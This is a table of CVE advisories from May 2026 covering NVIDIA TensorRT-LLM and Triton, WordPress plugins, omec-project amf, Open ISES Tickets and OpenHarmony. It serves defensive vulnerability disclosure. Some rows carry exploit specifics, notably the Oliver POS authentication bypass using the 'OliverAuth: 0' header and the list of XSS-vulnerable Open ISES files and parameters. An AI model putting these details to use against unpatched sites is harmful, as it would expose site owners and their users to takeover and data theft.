| NVIDIA–TensorRT-LLM | NVIDIA TRT-LLM for any platform contains a vulnerability where an attacker could cause an unchecked return value to a null pointer dereference. A successful exploit of this vulnerability might lead to denial of service. | 2026-05-20 | 5.5 | CVE-2026-24160 | https://nvd.nist.gov/vuln/detail/CVE-2026-24160 https://www.cve.org/CVERecord?id=CVE-2026-24160 https://nvidia.custhelp.com/app/answers/detail/a_id/5805 |
| NVIDIA–Triton Inference Server | NVIDIA Triton Inference Server contains a vulnerability where an attacker could cause a path traversal issue. A successful exploit of this vulnerability might lead to denial of service. | 2026-05-20 | 5.3 | CVE-2026-24208 | https://nvd.nist.gov/vuln/detail/CVE-2026-24208 https://www.cve.org/CVERecord?id=CVE-2026-24208 https://nvidia.custhelp.com/app/answers/detail/a_id/5828 |
| NVIDIA–Triton Inference Server | NVIDIA Triton Inference Server contains a vulnerability in the DALI backend, where an attacker could cause uncontrolled resource consumption. A successful exploit of this vulnerability might lead to denial of service. | 2026-05-20 | 5.7 | CVE-2026-24215 | https://nvd.nist.gov/vuln/detail/CVE-2026-24215 https://www.cve.org/CVERecord?id=CVE-2026-24215 https://nvidia.custhelp.com/app/answers/detail/a_id/5828 |
| oliverpos–Oliver POS A WooCommerce Point of Sale (POS) | The Oliver POS – A WooCommerce Point of Sale (POS) plugin for WordPress is vulnerable to Authorization Bypass Through User-Controlled Key in all versions up to and including 2.4.2.6. The plugin protects its entire /wp-json/pos-bridge/* REST API namespace through the oliver_pos_rest_authentication() permission callback, which uses a loose PHP comparison (==) to compare the attacker-supplied ‘OliverAuth’ header value against the ‘oliver_pos_authorization_token’ option. On fresh installations where the admin has not yet completed the connection flow, this option is unset (get_option returns false). Due to PHP’s type juggling, the loose comparison ‘0’ == false evaluates to true, allowing an unauthenticated attacker to bypass authentication by sending ‘OliverAuth: 0’. This grants full access to all POS API endpoints, enabling attackers to read user data (including administrator details), update user profiles (including email addresses), and delete non-admin users. An admin account email reset can lead to site takeover. | 2026-05-20 | 6.5 | CVE-2026-6072 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ca6aa922-9c58-445c-b88a-3d1d1c95102c?source=cve https://plugins.trac.wordpress.org/browser/oliver-pos/trunk/includes/class-pos-bridge.php#L1679 https://plugins.trac.wordpress.org/browser/oliver-pos/tags/2.4.2.6/includes/class-pos-bridge.php#L1679 https://plugins.trac.wordpress.org/browser/oliver-pos/trunk/includes/class-pos-bridge.php#L1677 https://plugins.trac.wordpress.org/browser/oliver-pos/tags/2.4.2.6/includes/class-pos-bridge.php#L1677 https://plugins.trac.wordpress.org/browser/oliver-pos/trunk/includes/class-pos-bridge-user.php#L170 https://plugins.trac.wordpress.org/browser/oliver-pos/tags/2.4.2.6/includes/class-pos-bridge-user.php#L170 https://plugins.trac.wordpress.org/browser/oliver-pos/trunk/includes/class-pos-bridge-user.php#L195 https://plugins.trac.wordpress.org/browser/oliver-pos/tags/2.4.2.6/includes/class-pos-bridge-user.php#L195 https://plugins.trac.wordpress.org/browser/oliver-pos/trunk/includes/class-pos-bridge-user.php#L231 https://plugins.trac.wordpress.org/browser/oliver-pos/tags/2.4.2.6/includes/class-pos-bridge-user.php#L231 |
| olivesystem– | The 診æ–ジェãƒãƒ¬ãƒ¼ã‚¿ä½œæˆãƒ—ラグイン (Diagnosis Generator) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘js’ parameter in versions up to and including 1.4.16. This is due to missing authorization checks and insufficient input sanitization in the themeFunc() function. The function is hooked to ‘admin_init’ and processes theme update requests without verifying user capabilities, allowing any authenticated user (including subscribers) to save malicious JavaScript to theme files. Additionally, the save() function uses stripslashes() which removes WordPress’s magic quotes protection. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in theme files that will execute whenever a user accesses a page containing the diagnosis form shortcode. | 2026-05-20 | 6.4 | CVE-2026-5293 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c5293c0f-90b0-41df-a623-90297d998c41?source=cve https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/trunk/diagnosisAdminClass.php#L409 https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/tags/1.4.16/diagnosisAdminClass.php#L409 https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/trunk/class/themeClass.php#L26 https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/tags/1.4.16/class/themeClass.php#L26 https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/trunk/class/themeClass.php#L39 https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/tags/1.4.16/class/themeClass.php#L39 https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/trunk/include_files/user-viewFormPage.php#L102 https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/tags/1.4.16/include_files/user-viewFormPage.php#L102 |
| omec-project–amf | A vulnerability was detected in omec-project amf up to 2.1.1. Affected by this vulnerability is an unknown functionality of the component PathSwitchRequest Handler. The manipulation results in memory corruption. The attack may be launched remotely. The exploit is now public and may be used. It is advisable to implement a patch to correct this issue. | 2026-05-23 | 6.3 | CVE-2026-9298 | VDB-365245 | omec-project amf PathSwitchRequest memory corruption VDB-365245 | CTI Indicators (IOB, IOC) Submit #811684 | Linux Foundation Projects SD-Core 2.1.1 Memory Corruption https://github.com/omec-project/amf/issues/680 https://github.com/omec-project/amf/pull/666 https://github.com/omec-project/amf/ |
| omec-project–amf | A flaw has been found in omec-project amf up to 2.1.1. Affected by this issue is the function PDUSessionResourceModifyIndication of the file /go/src/amf/ngap/handler.go. This manipulation causes memory corruption. Remote exploitation of the attack is possible. The exploit has been published and may be used. Applying a patch is the recommended action to fix this issue. | 2026-05-23 | 6.3 | CVE-2026-9299 | VDB-365246 | omec-project amf handler.go PDUSessionResourceModifyIndication memory corruption VDB-365246 | CTI Indicators (IOB, IOC, IOA) Submit #811829 | Linux Foundation Projects SD-Core 2.1.1 Memory Corruption https://github.com/omec-project/amf/issues/681 https://github.com/omec-project/amf/pull/666 https://github.com/omec-project/amf/ |
| omec-project–amf | A vulnerability has been found in omec-project amf up to 2.1.1. This affects an unknown part of the component NGSetupRequest Handler. Such manipulation leads to memory corruption. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. It is best practice to apply a patch to resolve this issue. | 2026-05-23 | 6.3 | CVE-2026-9300 | VDB-365247 | omec-project amf NGSetupRequest memory corruption VDB-365247 | CTI Indicators (IOB, IOC) Submit #811841 | Linux Foundation Projects SD-Core 2.1.1 Memory Corruption https://github.com/omec-project/amf/issues/679 https://github.com/omec-project/amf/pull/666 https://github.com/omec-project/amf/ |
| omec-project–amf | A vulnerability was found in omec-project amf up to 2.1.1. This vulnerability affects unknown code of the component NGReset Message Handler. Performing a manipulation results in memory corruption. The attack is possible to be carried out remotely. The exploit has been made public and could be used. It is recommended to apply a patch to fix this issue. | 2026-05-23 | 6.3 | CVE-2026-9301 | VDB-365248 | omec-project amf NGReset Message memory corruption VDB-365248 | CTI Indicators (IOB, IOC) Submit #811842 | Linux Foundation Projects SD-Core 2.1.1 Memory Corruption https://github.com/omec-project/amf/issues/678 https://github.com/omec-project/amf/pull/666 https://github.com/omec-project/amf/ |
| omec-project–amf | A vulnerability was determined in omec-project amf up to 2.1.3-dev. Impacted is the function NGSetupRequest of the file ngap/handler.go. Executing a manipulation of the argument InformationElement can lead to memory corruption. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. Upgrading to version 2.2.0 is recommended to address this issue. The affected component should be upgraded. The same pull request fixes multiple security issues. | 2026-05-18 | 4.3 | CVE-2026-8779 | VDB-364403 | omec-project amf handler.go NGSetupRequest memory corruption VDB-364403 | CTI Indicators (IOB, IOC, IOA) Submit #811616 | Linux Foundation Projects SD-Core 2.1.1 Memory Corruption https://github.com/omec-project/amf/issues/671 https://github.com/omec-project/amf/pull/666 https://github.com/omec-project/amf/releases/tag/v2.2.0 https://github.com/omec-project/amf/ |
| omec-project–amf | A vulnerability was identified in omec-project amf up to 2.1.3-dev. The affected element is an unknown function of the file ngap/dispatcher.go of the component NGAP Message Handler. The manipulation leads to memory corruption. The attack may be initiated remotely. The exploit is publicly available and might be used. Upgrading to version 2.2.0 is sufficient to fix this issue. It is suggested to upgrade the affected component. The same pull request fixes multiple security issues. | 2026-05-18 | 4.3 | CVE-2026-8780 | VDB-364404 | omec-project amf NGAP Message dispatcher.go memory corruption VDB-364404 | CTI Indicators (IOB, IOC, IOA) Submit #811617 | Linux Foundation Projects SD-Core 2.1.1 Memory Corruption https://github.com/omec-project/amf/issues/670 https://github.com/omec-project/amf/pull/666 https://github.com/omec-project/amf/releases/tag/v2.2.0 https://github.com/omec-project/amf/ |
| omec-project–amf | A security flaw has been discovered in omec-project amf up to 2.1.3-dev. The impacted element is the function RANConfiguration of the file ngap/handler.go. The manipulation results in null pointer dereference. The attack may be launched remotely. The exploit has been released to the public and may be used for attacks. Upgrading to version 2.2.0 is sufficient to resolve this issue. Upgrading the affected component is recommended. The same pull request fixes multiple security issues. | 2026-05-18 | 4.3 | CVE-2026-8781 | VDB-364405 | omec-project amf handler.go RANConfiguration null pointer dereference VDB-364405 | CTI Indicators (IOB, IOC, IOA) Submit #811653 | Linux Foundation Projects SD-Core 2.1.1 Memory Corruption https://github.com/omec-project/amf/issues/673 https://github.com/omec-project/amf/pull/666 https://github.com/omec-project/amf/releases/tag/v2.2.0 https://github.com/omec-project/amf/ |
| omec-project–amf | A weakness has been identified in omec-project amf up to 2.1.3-dev. This affects an unknown function of the file ngap/handler.go of the component NGAP Message Handler. This manipulation causes null pointer dereference. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be used for attacks. Upgrading to version 2.2.0 mitigates this issue. It is recommended to upgrade the affected component. The same pull request fixes multiple security issues. | 2026-05-18 | 4.3 | CVE-2026-8782 | VDB-364406 | omec-project amf NGAP Message handler.go null pointer dereference VDB-364406 | CTI Indicators (IOB, IOC, IOA) Submit #811654 | Linux Foundation Projects SD-Core 2.1.1 Memory Corruption https://github.com/omec-project/amf/issues/674 https://github.com/omec-project/amf/pull/666 https://github.com/omec-project/amf/releases/tag/v2.2.0 https://github.com/omec-project/amf/ |
| omec-project–amf | A security vulnerability has been detected in omec-project amf up to 2.1.3-dev. This impacts the function UERadioCapabilityCheckResponse of the file ngap/dispatcher.go. Such manipulation leads to null pointer dereference. The attack can be executed remotely. The exploit has been disclosed publicly and may be used. Upgrading to version 2.2.0 will fix this issue. Upgrading the affected component is advised. The same pull request fixes multiple security issues. | 2026-05-18 | 4.3 | CVE-2026-8783 | VDB-364407 | omec-project amf dispatcher.go UERadioCapabilityCheckResponse null pointer dereference VDB-364407 | CTI Indicators (IOB, IOC, IOA) Submit #811655 | Linux Foundation Projects SD-Core 2.1.1 Memory Corruption https://github.com/omec-project/amf/issues/675 https://github.com/omec-project/amf/pull/666 https://github.com/omec-project/amf/releases/tag/v2.2.0 https://github.com/omec-project/amf/ |
| Open ISES–Tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in add.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the ticket_id POST parameter directly into an HTML form input value attribute. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim’s browser when the response is rendered. | 2026-05-21 | 5.4 | CVE-2026-48213 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-add-php-ticket-id-parameter |
| Open ISES–Tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in add_nm.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the ticket_id POST parameter directly into an HTML form input value attribute and an inline JavaScript string literal. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim’s browser when the response is rendered. | 2026-05-21 | 5.4 | CVE-2026-48214 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-add-nm-php-ticket-id-parameter |
| Open ISES–Tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in circle.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the frm_id POST parameter directly into an HTML form input value attribute. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim’s browser when the response is rendered. | 2026-05-21 | 5.4 | CVE-2026-48215 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-circle-php-frm-id-parameter |
| Open ISES–Tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in db_loader.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the multiple POST parameters (ticketshost, ticketsdb, ticketsuser, ticketspassword, ticketsprefix, db_schema) directly into HTML form input value attributes. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim’s browser when the response is rendered. | 2026-05-21 | 5.4 | CVE-2026-48216 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-db-loader-php-multiple-parameters |
| Open ISES–Tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in delete_module.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the multiple POST parameters (module_choice, flag, confirmation) directly into rendered HTML content and form action attributes. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim’s browser when the response is rendered. | 2026-05-21 | 5.4 | CVE-2026-48217 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-delete-module-php-multiple-parameters |
| Open ISES–Tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in icons/buttons/landb.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the frm_name and frm_id POST parameters directly into rendered HTML content and inline JavaScript. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim’s browser when the response is rendered. | 2026-05-21 | 5.4 | CVE-2026-48218 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-icons-buttons-landb-php-frm-name-and-frm-id-parameters |
| Open ISES–Tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in ics202.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the frm_add_str POST parameter directly into an HTML form hidden input value attribute. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim’s browser when the response is rendered. | 2026-05-21 | 5.4 | CVE-2026-48219 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-ics202-php-frm-add-str-parameter |
| Open ISES–Tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in ics205.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the frm_add_str POST parameter directly into an HTML form hidden input value attribute. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim’s browser when the response is rendered. | 2026-05-21 | 5.4 | CVE-2026-48220 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-ics205-php-frm-add-str-parameter |
| Open ISES–Tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in ics205a.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the frm_add_str POST parameter directly into an HTML form hidden input value attribute. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim’s browser when the response is rendered. | 2026-05-21 | 5.4 | CVE-2026-48221 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-ics205a-php-frm-add-str-parameter |
| Open ISES–Tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in ics213.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the frm_add_str POST parameter directly into an HTML form hidden input value attribute. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim’s browser when the response is rendered. | 2026-05-21 | 5.4 | CVE-2026-48222 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-ics213-php-frm-add-str-parameter |
| Open ISES–Tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in ics213rr.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the frm_add_str POST parameter directly into an HTML form hidden input value attribute. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim’s browser when the response is rendered. | 2026-05-21 | 5.4 | CVE-2026-48223 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-ics213rr-php-frm-add-str-parameter |
| Open ISES–Tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in ics214.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the frm_add_str POST parameter directly into an HTML form hidden input value attribute. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim’s browser when the response is rendered. | 2026-05-21 | 5.4 | CVE-2026-48224 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-ics214-php-frm-add-str-parameter |
| Open ISES–Tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in landb.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the _type POST parameter directly into an HTML form hidden input value attribute. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim’s browser when the response is rendered. | 2026-05-21 | 5.4 | CVE-2026-48225 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-landb-php-type-parameter |
| Open ISES–Tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in os_watch.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the ref and mode_orig POST parameters directly into HTML form hidden input value attributes. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim’s browser when the response is rendered. | 2026-05-21 | 5.4 | CVE-2026-48226 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-os-watch-php-ref-and-mode-orig-parameters |
| Open ISES–Tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in patient.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the id and ticket_id GET parameters directly into an HTML form action URL. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim’s browser when the response is rendered. | 2026-05-21 | 5.4 | CVE-2026-48227 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-patient-php-id-and-ticket-id-parameters |
| Open ISES–Tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in patient_w.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the id and ticket_id GET parameters directly into an HTML form action URL. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim’s browser when the response is rendered. | 2026-05-21 | 5.4 | CVE-2026-48228 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-patient-w-php-id-and-ticket-id-parameters |
| Open ISES–Tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in routes_i.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the ticket_id GET parameter directly into HTML form hidden input value attributes. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim’s browser when the response is rendered. | 2026-05-21 | 5.4 | CVE-2026-48229 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-routes-i-php-ticket-id-parameter |
| Open ISES–Tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in ticketsmdb_import.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the multiple POST parameters (mdbhost, mdbdb, mdbuser, mdbpassword, mdbprefix, ticketshost, ticketsdb, ticketsuser, ticketspassword, ticketsprefix) directly into HTML form hidden input value attributes. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim’s browser when the response is rendered. | 2026-05-21 | 5.4 | CVE-2026-48230 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-ticketsmdb-import-php-multiple-parameters |
| Open ISES–Tickets | Open ISES Tickets before 3.44.2 embeds a hardcoded WhitePages reverse-phone API key in wp1.php that is committed to the public source repository. Any actor with read access to the source tree can extract the key and use it to make third-party API calls billed to or rate-limited against the original owner’s WhitePages account. | 2026-05-21 | 5.3 | CVE-2026-48243 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-hardcoded-whitepages-api-key-in-wp1-php |
| Open ISES–Tickets | Open ISES Tickets before 3.44.2 embeds a hardcoded Google Maps API key in settings.inc.php that is committed to the public source repository. The key can be extracted by anyone with read access to the source and used to make Google Maps Platform requests billed against the original owner’s Google Cloud project. | 2026-05-21 | 5.3 | CVE-2026-48244 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-hardcoded-google-maps-api-key-in-settings-inc-php |
| Open ISES–Tickets | Open ISES Tickets before 3.44.2 embeds a hardcoded Google Maps API key in tables.php that is committed to the public source repository. The key can be extracted by anyone with read access to the source and used to make Google Maps Platform requests billed against the original owner’s Google Cloud project. | 2026-05-21 | 5.3 | CVE-2026-48245 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-hardcoded-google-maps-api-key-in-tables-php |
| Open ISES–Tickets | Open ISES Tickets before 3.44.2 disables TLS certificate verification in ajax/reports.php by setting CURLOPT_SSL_VERIFYPEER to false (and not setting CURLOPT_SSL_VERIFYHOST) when issuing outbound HTTPS requests for Google Maps Directions API lookups during incident report generation. An attacker positioned on the network path between the server and the remote endpoint can present a forged certificate to intercept, monitor, or modify the request and response, including any API keys or session-bearing data in transit. | 2026-05-21 | 5.9 | CVE-2026-48246 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-disabled-tls-certificate-verification-in-ajax-reports-php |
| Open ISES–Tickets | Open ISES Tickets before 3.44.2 disables TLS certificate verification in incs/functions.inc.php by setting CURLOPT_SSL_VERIFYPEER to false (and not setting CURLOPT_SSL_VERIFYHOST) when issuing outbound HTTPS requests for general-purpose outbound HTTPS requests issued by the shared helper functions. An attacker positioned on the network path between the server and the remote endpoint can present a forged certificate to intercept, monitor, or modify the request and response, including any API keys or session-bearing data in transit. | 2026-05-21 | 5.9 | CVE-2026-48247 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-disabled-tls-certificate-verification-in-incs-functions-inc-php |
| Open ISES–Tickets | Open ISES Tickets before 3.44.2 disables TLS certificate verification in incs/login.inc.php by setting CURLOPT_SSL_VERIFYPEER to false (and not setting CURLOPT_SSL_VERIFYHOST) when issuing outbound HTTPS requests issued during the login/authentication flow. An attacker positioned on the network path between the server and the remote endpoint can present a forged certificate to intercept, monitor, or modify the request and response, including any API keys or session-bearing data in transit. | 2026-05-21 | 5.9 | CVE-2026-48248 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-disabled-tls-certificate-verification-in-incs-login-inc-php |
| Open ISES–Tickets | Open ISES Tickets before 3.44.2 disables TLS certificate verification in rm/incs/mobile_login.inc.php by setting CURLOPT_SSL_VERIFYPEER to false (and not setting CURLOPT_SSL_VERIFYHOST) when issuing outbound HTTPS requests issued during the mobile (RouteMate) login flow. An attacker positioned on the network path between the server and the remote endpoint can present a forged certificate to intercept, monitor, or modify the request and response, including any API keys or session-bearing data in transit. | 2026-05-21 | 5.9 | CVE-2026-48249 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-disabled-tls-certificate-verification-in-rm-incs-mobile-login-inc-php |
| OpenHarmony–OpenHarmony | in OpenHarmony v6.0 and prior versions allow a local attacker arbitrary code execution. | 2026-05-19 | 6.5 | CVE-2026-28733 | https://gitcode.com/openharmony/security/tree/master/zh/security-disclosure/2026/2026-05.md |
| OpenHarmony–OpenHarmony | in OpenHarmony v6.0 and prior versions allow a local attacker cause information leak | 2026-05-19 | 5.5 | CVE-2026-25850 | https://gitcode.com/openharmony/security/tree/master/zh/security-disclosure/2026/2026-05.md |
| OpenHarmony–OpenHarmony | in OpenHarmony v6.0 and prior versions allow a local attacker cause information leak. | 2026-05-19 | 5.5 | CVE-2026-27766 | https://gitcode.com/openharmony/security/tree/master/zh/security-disclosure/2026/2026-05.md |
| openises–tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in single_unit.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the id GET parameter directly into an HTML attribute. Attackers can craft a malicious URL containing a JavaScript payload in the id parameter that executes in the victim’s browser when the URL is visited. | 2026-05-20 | 4.6 | CVE-2026-35007 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-single-unit-php-id-parameter |
| openises–tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in single.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the ticket_id GET parameter directly into an HTML attribute. Attackers can craft a malicious URL containing a JavaScript payload in the id parameter that executes in the victim’s browser when the URL is visited. | 2026-05-20 | 4.6 | CVE-2026-35008 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-single-php-ticket-id-parameter |
| openises–tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in add_note.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the ticket_id GET parameter directly into a hidden input field VALUE attribute. Attackers can craft a malicious URL containing a JavaScript payload in the ticket_id parameter that executes in the victim’s browser when the URL is visited. | 2026-05-20 | 4.6 | CVE-2026-35009 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-add-note-php-ticket-id-parameter |
| openises–tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in patient_JF.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the ticket_id GET parameter directly into a JavaScript variable assignment. Attackers can craft a malicious URL containing a JavaScript payload in the ticket_id parameter that executes in the victim’s browser when the URL is visited. | 2026-05-20 | 4.6 | CVE-2026-35010 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-patient-jf-php-ticket-id-parameter |
